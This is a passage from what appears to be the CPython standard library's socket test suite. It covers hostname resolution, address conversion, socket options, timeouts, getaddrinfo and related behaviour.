self.assertIn('(1 given)', str(cm.exception))
with self.assertRaises(TypeError) as cm:
s.sendto(b'foo', 0, sockname, 4)
self.assertIn('(4 given)', str(cm.exception))
def testCrucialConstants(self):
# Testing for mission critical constants
socket.AF_INET
socket.SOCK_STREAM
socket.SOCK_DGRAM
socket.SOCK_RAW
socket.SOCK_RDM
socket.SOCK_SEQPACKET
socket.SOL_SOCKET
socket.SO_REUSEADDR
def testHostnameRes(self):
# Testing hostname resolution mechanisms
hostname = socket.gethostname()
try:
ip = socket.gethostbyname(hostname)
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
try:
hname, aliases, ipaddrs = socket.gethostbyaddr(ip)
except OSError:
# Probably a similar problem as above; skip this test
self.skipTest('name lookup failure')
all_host_names = [hostname, hname] + aliases
fqhn = socket.getfqdn(ip)
if not fqhn in all_host_names:
self.fail("Error testing host resolution mechanisms. (fqdn: %s, all: %s)" % (fqhn, repr(all_host_names)))
def test_host_resolution(self):
for addr in [support.HOSTv4, '10.0.0.1', '255.255.255.255']:
self.assertEqual(socket.gethostbyname(addr), addr)
# we don't test support.HOSTv6 because there's a chance it doesn't have
# a matching name entry (e.g. 'ip6-localhost')
for host in [support.HOSTv4]:
self.assertIn(host, socket.gethostbyaddr(host)[2])
def test_host_resolution_bad_address(self):
# These are all malformed IP addresses and expected not to resolve to
# any result. But some ISPs, e.g. AWS, may successfully resolve these
# IPs.
explanation = (
"resolving an invalid IP address did not raise OSError; "
"can be caused by a broken DNS server"
)
for addr in ['0.1.1.~1', '1+.1.1.1', '::1q', '::1::2',
'1:1:1:1:1:1:1:1:1']:
with self.assertRaises(OSError, msg=addr):
socket.gethostbyname(addr)
with self.assertRaises(OSError, msg=explanation):
socket.gethostbyaddr(addr)
@unittest.skipUnless(hasattr(socket, 'sethostname'), "test needs socket.sethostname()")
@unittest.skipUnless(hasattr(socket, 'gethostname'), "test needs socket.gethostname()")
def test_sethostname(self):
oldhn = socket.gethostname()
try:
socket.sethostname('new')
except OSError as e:
if e.errno == errno.EPERM:
self.skipTest("test should be run as root")
else:
raise
try:
# running test as root!
self.assertEqual(socket.gethostname(), 'new')
# Should work with bytes objects too
socket.sethostname(b'bar')
self.assertEqual(socket.gethostname(), 'bar')
finally:
socket.sethostname(oldhn)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInterfaceNameIndex(self):
interfaces = socket.if_nameindex()
for index, name in interfaces:
self.assertIsInstance(index, int)
self.assertIsInstance(name, str)
# interface indices are non-zero integers
self.assertGreater(index, 0)
_index = socket.if_nametoindex(name)
self.assertIsInstance(_index, int)
self.assertEqual(index, _index)
_name = socket.if_indextoname(index)
self.assertIsInstance(_name, str)
self.assertEqual(name, _name)
@unittest.skipUnless(hasattr(socket, 'if_nameindex'),
'socket.if_nameindex() not available.')
def testInvalidInterfaceNameIndex(self):
# test nonexistent interface index/name
self.assertRaises(OSError, socket.if_indextoname, 0)
self.assertRaises(OSError, socket.if_nametoindex, '_DEADBEEF')
# test with invalid values
self.assertRaises(TypeError, socket.if_nametoindex, 0)
self.assertRaises(TypeError, socket.if_indextoname, '_DEADBEEF')
@unittest.skipUnless(hasattr(sys, 'getrefcount'),
'test needs sys.getrefcount()')
def testRefCountGetNameInfo(self):
# Testing reference count for getnameinfo
try:
# On some versions, this loses a reference
orig = sys.getrefcount(__name__)
socket.getnameinfo(__name__,0)
except TypeError:
if sys.getrefcount(__name__) != orig:
self.fail("socket.getnameinfo loses a reference")
def testInterpreterCrash(self):
# Making sure getnameinfo doesn't crash the interpreter
try:
# On some versions, this crashes the interpreter.
socket.getnameinfo(('x', 0, 0, 0), 0)
except OSError:
pass
def testNtoH(self):
# This just checks that htons etc. are their own inverse,
# when looking at the lower 16 or 32 bits.
sizes = {socket.htonl: 32, socket.ntohl: 32,
socket.htons: 16, socket.ntohs: 16}
for func, size in sizes.items():
mask = (1<<size) - 1
for i in (0, 1, 0xffff, ~0xffff, 2, 0x01234567, 0x76543210):
self.assertEqual(i & mask, func(func(i&mask)) & mask)
swapped = func(mask)
self.assertEqual(swapped & mask, mask)
self.assertRaises(OverflowError, func, 1<<34)
@support.cpython_only
def testNtoHErrors(self):
import _testcapi
s_good_values = [0, 1, 2, 0xffff]
l_good_values = s_good_values + [0xffffffff]
l_bad_values = [-1, -2, 1<<32, 1<<1000]
s_bad_values = l_bad_values + [_testcapi.INT_MIN - 1,
_testcapi.INT_MAX + 1]
s_deprecated_values = [1<<16, _testcapi.INT_MAX]
for k in s_good_values:
socket.ntohs(k)
socket.htons(k)
for k in l_good_values:
socket.ntohl(k)
socket.htonl(k)
for k in s_bad_values:
self.assertRaises(OverflowError, socket.ntohs, k)
self.assertRaises(OverflowError, socket.htons, k)
for k in l_bad_values:
self.assertRaises(OverflowError, socket.ntohl, k)
self.assertRaises(OverflowError, socket.htonl, k)
for k in s_deprecated_values:
self.assertWarns(DeprecationWarning, socket.ntohs, k)
self.assertWarns(DeprecationWarning, socket.htons, k)
def testGetServBy(self):
eq = self.assertEqual
# Find one service that exists, then check all the related interfaces.
# I've ordered this by protocols that have both a tcp and udp
# protocol, at least for modern Linuxes.
if (sys.platform.startswith(('freebsd', 'netbsd', 'gnukfreebsd'))
or sys.platform in ('linux', 'darwin')):
# avoid the 'echo' service on this platform, as there is an
# assumption breaking non-standard port/protocol entry
services = ('daytime', 'qotd', 'domain')
else:
services = ('echo', 'daytime', 'domain')
for service in services:
try:
port = socket.getservbyname(service, 'tcp')
break
except OSError:
pass
else:
raise OSError
# Try same call with optional protocol omitted
# Issue #26936: Android getservbyname() was broken before API 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
port2 = socket.getservbyname(service)
eq(port, port2)
# Try udp, but don't barf if it doesn't exist
try:
udpport = socket.getservbyname(service, 'udp')
except OSError:
udpport = None
else:
eq(udpport, port)
# Now make sure the lookup by port returns the same service name
# Issue #26936: Android getservbyport() is broken.
if not support.is_android:
eq(socket.getservbyport(port2), service)
eq(socket.getservbyport(port, 'tcp'), service)
if udpport is not None:
eq(socket.getservbyport(udpport, 'udp'), service)
# Make sure getservbyport does not accept out of range ports.
self.assertRaises(OverflowError, socket.getservbyport, -1)
self.assertRaises(OverflowError, socket.getservbyport, 65536)
def testDefaultTimeout(self):
# Testing default timeout
# The default timeout should initially be None
self.assertEqual(socket.getdefaulttimeout(), None)
s = socket.socket()
self.assertEqual(s.gettimeout(), None)
s.close()
# Set the default timeout to 10, and see if it propagates
with socket_setdefaulttimeout(10):
self.assertEqual(socket.getdefaulttimeout(), 10)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), 10)
# Reset the default timeout to None, and see if it propagates
socket.setdefaulttimeout(None)
self.assertEqual(socket.getdefaulttimeout(), None)
with socket.socket() as sock:
self.assertEqual(sock.gettimeout(), None)
# Check that setting it to an invalid value raises ValueError
self.assertRaises(ValueError, socket.setdefaulttimeout, -1)
# Check that setting it to an invalid type raises TypeError
self.assertRaises(TypeError, socket.setdefaulttimeout, "spam")
@unittest.skipUnless(hasattr(socket, 'inet_aton'),
'test needs socket.inet_aton()')
def testIPv4_inet_aton_fourbytes(self):
# Test that issue1008086 and issue767150 are fixed.
# It must return 4 bytes.
self.assertEqual(b'\x00'*4, socket.inet_aton('0.0.0.0'))
self.assertEqual(b'\xff'*4, socket.inet_aton('255.255.255.255'))
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv4toString(self):
from socket import inet_aton as f, inet_pton, AF_INET
g = lambda a: inet_pton(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual(b'\x00\x00\x00\x00', f('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', f('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', f('170.170.170.170'))
self.assertEqual(b'\x01\x02\x03\x04', f('1.2.3.4'))
self.assertEqual(b'\xff\xff\xff\xff', f('255.255.255.255'))
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid(f, '0.0.0.')
assertInvalid(f, '300.0.0.0')
assertInvalid(f, 'a.0.0.0')
assertInvalid(f, '1.2.3.4.5')
assertInvalid(f, '::1')
self.assertEqual(b'\x00\x00\x00\x00', g('0.0.0.0'))
self.assertEqual(b'\xff\x00\xff\x00', g('255.0.255.0'))
self.assertEqual(b'\xaa\xaa\xaa\xaa', g('170.170.170.170'))
self.assertEqual(b'\xff\xff\xff\xff', g('255.255.255.255'))
assertInvalid(g, '0.0.0.')
assertInvalid(g, '300.0.0.0')
assertInvalid(g, 'a.0.0.0')
assertInvalid(g, '1.2.3.4.5')
assertInvalid(g, '::1')
@unittest.skipUnless(hasattr(socket, 'inet_pton'),
'test needs socket.inet_pton()')
def testIPv6toString(self):
try:
from socket import inet_pton, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_pton(AF_INET6, '::')
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_pton(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual(b'\x00' * 16, f('::'))
self.assertEqual(b'\x00' * 16, f('0::0'))
self.assertEqual(b'\x00\x01' + b'\x00' * 14, f('1::'))
self.assertEqual(
b'\x45\xef\x76\xcb\x00\x1a\x56\xef\xaf\xeb\x0b\xac\x19\x24\xae\xae',
f('45ef:76cb:1a:56ef:afeb:bac:1924:aeae')
)
self.assertEqual(
b'\xad\x42\x0a\xbc' + b'\x00' * 4 + b'\x01\x27\x00\x00\x02\x54\x00\x02',
f('ad42:abc::127:0:254:2')
)
self.assertEqual(b'\x00\x12\x00\x0a' + b'\x00' * 12, f('12:a::'))
assertInvalid('0x20::')
assertInvalid(':::')
assertInvalid('::0::')
assertInvalid('1::abc::')
assertInvalid('1::abc::def')
assertInvalid('1:2:3:4:5:6')
assertInvalid('1:2:3:4:5:6:7:8:0')
# bpo-29972: inet_pton() doesn't fail on AIX
if not sys.platform.startswith('aix'):
assertInvalid('1:2:3:4:5:6:')
assertInvalid('1:2:3:4:5:6:7:8:')
self.assertEqual(b'\x00' * 12 + b'\xfe\x2a\x17\x40',
f('::254.42.23.64')
)
self.assertEqual(
b'\x00\x42' + b'\x00' * 8 + b'\xa2\x9b\xfe\x2a\x17\x40',
f('42::a29b:254.42.23.64')
)
self.assertEqual(
b'\x00\x42\xa8\xb9\x00\x00\x00\x02\xff\xff\xa2\x9b\xfe\x2a\x17\x40',
f('42:a8b9:0:2:ffff:a29b:254.42.23.64')
)
assertInvalid('255.254.253.252')
assertInvalid('1::260.2.3.0')
assertInvalid('1::0.be.e.0')
assertInvalid('1:2:3:4:5:6:7:1.2.3.4')
assertInvalid('::1.2.3.4:0')
assertInvalid('0.100.200.0:3:4:5:6:7:8')
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv4(self):
from socket import inet_ntoa as f, inet_ntop, AF_INET
g = lambda a: inet_ntop(AF_INET, a)
assertInvalid = lambda func,a: self.assertRaises(
(OSError, ValueError), func, a
)
self.assertEqual('1.0.1.0', f(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', f(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', f(b'\xff\xff\xff\xff'))
self.assertEqual('1.2.3.4', f(b'\x01\x02\x03\x04'))
assertInvalid(f, b'\x00' * 3)
assertInvalid(f, b'\x00' * 5)
assertInvalid(f, b'\x00' * 16)
self.assertEqual('170.85.170.85', f(bytearray(b'\xaa\x55\xaa\x55')))
self.assertEqual('1.0.1.0', g(b'\x01\x00\x01\x00'))
self.assertEqual('170.85.170.85', g(b'\xaa\x55\xaa\x55'))
self.assertEqual('255.255.255.255', g(b'\xff\xff\xff\xff'))
assertInvalid(g, b'\x00' * 3)
assertInvalid(g, b'\x00' * 5)
assertInvalid(g, b'\x00' * 16)
self.assertEqual('170.85.170.85', g(bytearray(b'\xaa\x55\xaa\x55')))
@unittest.skipUnless(hasattr(socket, 'inet_ntop'),
'test needs socket.inet_ntop()')
def testStringToIPv6(self):
try:
from socket import inet_ntop, AF_INET6, has_ipv6
if not has_ipv6:
self.skipTest('IPv6 not available')
except ImportError:
self.skipTest('could not import needed symbols from socket')
if sys.platform == "win32":
try:
inet_ntop(AF_INET6, b'\x00' * 16)
except OSError as e:
if e.winerror == 10022:
self.skipTest('IPv6 might not be supported')
f = lambda a: inet_ntop(AF_INET6, a)
assertInvalid = lambda a: self.assertRaises(
(OSError, ValueError), f, a
)
self.assertEqual('::', f(b'\x00' * 16))
self.assertEqual('::1', f(b'\x00' * 15 + b'\x01'))
self.assertEqual(
'aef:b01:506:1001:ffff:9997:55:170',
f(b'\x0a\xef\x0b\x01\x05\x06\x10\x01\xff\xff\x99\x97\x00\x55\x01\x70')
)
self.assertEqual('::1', f(bytearray(b'\x00' * 15 + b'\x01')))
assertInvalid(b'\x12' * 15)
assertInvalid(b'\x12' * 17)
assertInvalid(b'\x12' * 4)
# XXX The following don't test module-level functionality...
def testSockName(self):
# Testing getsockname()
port = support.find_unused_port()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.bind(("0.0.0.0", port))
name = sock.getsockname()
# XXX(nnorwitz): http://tinyurl.com/os5jz seems to indicate
# it reasonable to get the host's addr in addition to 0.0.0.0.
# At least for eCos. This is required for the S/390 to pass.
try:
my_ip_addr = socket.gethostbyname(socket.gethostname())
except OSError:
# Probably name lookup wasn't set up right; skip this test
self.skipTest('name lookup failure')
self.assertIn(name[0], ("0.0.0.0", my_ip_addr), '%s invalid' % name[0])
self.assertEqual(name[1], port)
def testGetSockOpt(self):
# Testing getsockopt()
# We know a socket should start without reuse==0
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse != 0, "initial mode is reuse")
def testSetSockOpt(self):
# Testing setsockopt()
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
reuse = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR)
self.assertFalse(reuse == 0, "failed to set reuse mode")
def testSendAfterClose(self):
# testing send() after close() with timeout
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(1)
sock.close()
self.assertRaises(OSError, sock.send, b"spam")
def testCloseException(self):
sock = socket.socket()
sock.bind((socket._LOCALHOST, 0))
socket.socket(fileno=sock.fileno()).close()
try:
sock.close()
except OSError as err:
# Winsock apparently raises ENOTSOCK
self.assertIn(err.errno, (errno.EBADF, errno.ENOTSOCK))
else:
self.fail("close() should raise EBADF/ENOTSOCK")
def testNewAttributes(self):
# testing .family, .type and .protocol
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.assertEqual(sock.family, socket.AF_INET)
if hasattr(socket, 'SOCK_CLOEXEC'):
self.assertIn(sock.type,
(socket.SOCK_STREAM | socket.SOCK_CLOEXEC,
socket.SOCK_STREAM))
else:
self.assertEqual(sock.type, socket.SOCK_STREAM)
self.assertEqual(sock.proto, 0)
sock.close()
def test_getsockaddrarg(self):
sock = socket.socket()
self.addCleanup(sock.close)
port = support.find_unused_port()
big_port = port + 65536
neg_port = port - 65536
self.assertRaises(OverflowError, sock.bind, (HOST, big_port))
self.assertRaises(OverflowError, sock.bind, (HOST, neg_port))
# Since find_unused_port() is inherently subject to race conditions, we
# call it a couple times if necessary.
for i in itertools.count():
port = support.find_unused_port()
try:
sock.bind((HOST, port))
except OSError as e:
if e.errno != errno.EADDRINUSE or i == 5:
raise
else:
break
@unittest.skipUnless(os.name == "nt", "Windows specific")
def test_sock_ioctl(self):
self.assertTrue(hasattr(socket.socket, 'ioctl'))
self.assertTrue(hasattr(socket, 'SIO_RCVALL'))
self.assertTrue(hasattr(socket, 'RCVALL_ON'))
self.assertTrue(hasattr(socket, 'RCVALL_OFF'))
self.assertTrue(hasattr(socket, 'SIO_KEEPALIVE_VALS'))
s = socket.socket()
self.addCleanup(s.close)
self.assertRaises(ValueError, s.ioctl, -1, None)
s.ioctl(socket.SIO_KEEPALIVE_VALS, (1, 100, 100))
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(hasattr(socket, 'SIO_LOOPBACK_FAST_PATH'),
'Loopback fast path support required for this test')
def test_sio_loopback_fast_path(self):
s = socket.socket()
self.addCleanup(s.close)
try:
s.ioctl(socket.SIO_LOOPBACK_FAST_PATH, True)
except OSError as exc:
WSAEOPNOTSUPP = 10045
if exc.winerror == WSAEOPNOTSUPP:
self.skipTest("SIO_LOOPBACK_FAST_PATH is defined but "
"doesn't implemented in this Windows version")
raise
self.assertRaises(TypeError, s.ioctl, socket.SIO_LOOPBACK_FAST_PATH, None)
def testGetaddrinfo(self):
try:
socket.getaddrinfo('localhost', 80)
except socket.gaierror as err:
if err.errno == socket.EAI_SERVICE:
# see http://bugs.python.org/issue1282647
self.skipTest("buggy libc version")
raise
# len of every sequence is supposed to be == 5
for info in socket.getaddrinfo(HOST, None):
self.assertEqual(len(info), 5)
# host can be a domain name, a string representation of an
# IPv4/v6 address or None
socket.getaddrinfo('localhost', 80)
socket.getaddrinfo('127.0.0.1', 80)
socket.getaddrinfo(None, 80)
if support.IPV6_ENABLED:
socket.getaddrinfo('::1', 80)
# port can be a string service name such as "http", a numeric
# port number or None
# Issue #26936: Android getaddrinfo() was broken before API level 23.
if (not hasattr(sys, 'getandroidapilevel') or
sys.getandroidapilevel() >= 23):
socket.getaddrinfo(HOST, "http")
socket.getaddrinfo(HOST, 80)
socket.getaddrinfo(HOST, None)
# test family and socktype filters
infos = socket.getaddrinfo(HOST, 80, socket.AF_INET, socket.SOCK_STREAM)
for family, type, _, _, _ in infos:
self.assertEqual(family, socket.AF_INET)
self.assertEqual(str(family), 'AddressFamily.AF_INET')
self.assertEqual(type, socket.SOCK_STREAM)
self.assertEqual(str(type), 'SocketKind.SOCK_STREAM')
infos = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
for _, socktype, _, _, _ in infos:
self.assertEqual(socktype, socket.SOCK_STREAM)
# test proto and flags arguments
socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
# a server willing to support both IPv4 and IPv6 will
# usually do this
socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
# test keyword arguments
a = socket.getaddrinfo(HOST, None)
b = socket.getaddrinfo(host=HOST, port=None)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, socket.AF_INET)
b = socket.getaddrinfo(HOST, None, family=socket.AF_INET)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, socket.SOCK_STREAM)
b = socket.getaddrinfo(HOST, None, type=socket.SOCK_STREAM)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, socket.SOL_TCP)
b = socket.getaddrinfo(HOST, None, proto=socket.SOL_TCP)
self.assertEqual(a, b)
a = socket.getaddrinfo(HOST, None, 0, 0, 0, socket.AI_PASSIVE)
b = socket.getaddrinfo(HOST, None, flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
a = socket.getaddrinfo(None, 0, socket.AF_UNSPEC, socket.SOCK_STREAM, 0,
socket.AI_PASSIVE)
b = socket.getaddrinfo(host=None, port=0, family=socket.AF_UNSPEC,
type=socket.SOCK_STREAM, proto=0,
flags=socket.AI_PASSIVE)
self.assertEqual(a, b)
# Issue #6697.
self.assertRaises(UnicodeEncodeError, socket.getaddrinfo, 'localhost', '\uD800')
# Issue 17269: test workaround for OS X platform bug segfault
if hasattr(socket, 'AI_NUMERICSERV'):
try:
# The arguments here are undefined and the call may succeed
# or fail. All we care here is that it doesn't segfault.
socket.getaddrinfo("localhost", None, 0, 0, 0,
socket.AI_NUMERICSERV)
except socket.gaierror:
pass
def test_getnameinfo(self):
# only IP addresses are allowed
self.assertRaises(OSError, socket.getnameinfo, ('mail.python.org',0), 0)
@unittest.skipUnless(support.is_resource_enabled('network'),
'network is not enabled')
def test_idna(self):
# Check for internet access before running test
# (issue #12804, issue #25138).
with support.transient_internet('python.org'):
socket.gethostbyname('python.org')
# these should all be successful
domain = 'испытание.pythontest.net'
socket.gethostbyname(domain)
socket.gethostbyname_ex(domain)
socket.getaddrinfo(domain,0,socket.AF_UNSPEC,socket.SOCK_STREAM)
# this may not work if the forward lookup chooses the IPv6 address, as that doesn't
# have a reverse entry yet
# socket.gethostbyaddr('испытание.python.org')
def check_sendall_interrupted(self, with_timeout):
# socketpair() is not strictly required, but it makes things easier.
if not hasattr(signal, 'alarm') or not hasattr(socket, 'socketpair'):
self.skipTest("signal.alarm and socket.socketpair required for this test")
# Our signal handlers clobber the C errno by calling a math function
# with an invalid domain value.
def ok_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
def raising_handler(*args):
self.assertRaises(ValueError, math.acosh, 0)
1 // 0
c, s = socket.socketpair()
old_alarm = signal.signal(signal.SIGALRM, raising_handler)
try:
if with_timeout:
# Just above the one second minimum for signal.alarm
c.settimeout(1.5)
with self.assertRaises(ZeroDivisionError):
signal.alarm(1)
c.sendall(b"x" * support.SOCK_MAX_SIZE)
if with_timeout:
signal.signal(signal.SIGALRM, ok_handler)
signal.alarm(1)
self.assertRaises(socket.timeout, c.sendall,
b"x" * support.SOCK_MAX_SIZE)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_alarm)
c.close()
s.close()
def test_sendall_interrupted(self):
self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_socket_close(self):
sock = socket.socket()
try:
sock.bind((HOST, 0))
socket.close(sock.fileno())
with self.assertRaises(OSError):
sock.listen(1)
finally:
with self.assertRaises(OSError):
# sock.close() fails with EBADF
sock.close()
with self.assertRaises(TypeError):
socket.close(None)
with self.assertRaises(OSError):
socket.close(-1)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_getaddrinfo_ipv6_basic(self):
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D', # Note capital letter `D`.
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, 0))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getaddrinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface (Linux, Mac OS X)
(ifindex, test_interface) = socket.if_nameindex()[0]
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + test_interface,
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getaddrinfo_ipv6_scopeid_numeric(self):
# Also works on Linux and Mac OS X, but is not documented (?)
# Windows, Linux and Max OS X allow nonexistent interface numbers here.
ifindex = 42
((*_, sockaddr),) = socket.getaddrinfo(
'ff02::1de:c0:face:8D%' + str(ifindex),
1234, socket.AF_INET6,
socket.SOCK_DGRAM,
socket.IPPROTO_UDP
)
# Note missing interface name part in IPv6 address
self.assertEqual(sockaddr, ('ff02::1de:c0:face:8d', 1234, 0, ifindex))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
hasattr(socket, 'if_nameindex'),
'if_nameindex is not supported')
def test_getnameinfo_ipv6_scopeid_symbolic(self):
# Just pick up any network interface.
(ifindex, test_interface) = socket.if_nameindex()[0]
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + test_interface, '1234'))
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
@unittest.skipUnless(
sys.platform == 'win32',
'Numeric scope id does not work or undocumented')
def test_getnameinfo_ipv6_scopeid_numeric(self):
# Also works on Linux (undocumented), but does not work on Mac OS X
# Windows and Linux allow nonexistent interface numbers here.
ifindex = 42
sockaddr = ('ff02::1de:c0:face:8D', 1234, 0, ifindex) # Note capital letter `D`.
nameinfo = socket.getnameinfo(sockaddr, socket.NI_NUMERICHOST | socket.NI_NUMERICSERV)
self.assertEqual(nameinfo, ('ff02::1de:c0:face:8d%' + str(ifindex), '1234'))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
def test_socket_consistent_sock_type(self):
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
SOCK_CLOEXEC = getattr(socket, 'SOCK_CLOEXEC', 0)
sock_type = socket.SOCK_STREAM | SOCK_NONBLOCK | SOCK_CLOEXEC
with socket.socket(socket.AF_INET, sock_type) as s:
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(1)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.settimeout(0)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(True)
self.assertEqual(s.type, socket.SOCK_STREAM)
s.setblocking(False)
self.assertEqual(s.type, socket.SOCK_STREAM)
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_unknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
unknown_family = max(socket.AddressFamily.__members__.values()) + 1
unknown_type = max(
kind
for name, kind in socket.SocketKind.__members__.items()
if name not in {'SOCK_NONBLOCK', 'SOCK_CLOEXEC'}
) + 1
with socket.socket(
family=unknown_family, type=unknown_type, proto=23,
fileno=fd) as s:
self.assertEqual(s.family, unknown_family)
